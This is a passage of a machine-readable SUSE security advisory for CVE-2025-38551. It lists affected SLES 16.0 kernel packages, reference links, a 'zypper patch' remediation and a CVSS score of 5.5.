"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-38551",
"url": "https://www.suse.com/security/cve/CVE-2025-38551"
},
{
"category": "external",
"summary": "SUSE Bug 1248234 for CVE-2025-38551",
"url": "https://bugzilla.suse.com/1248234"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
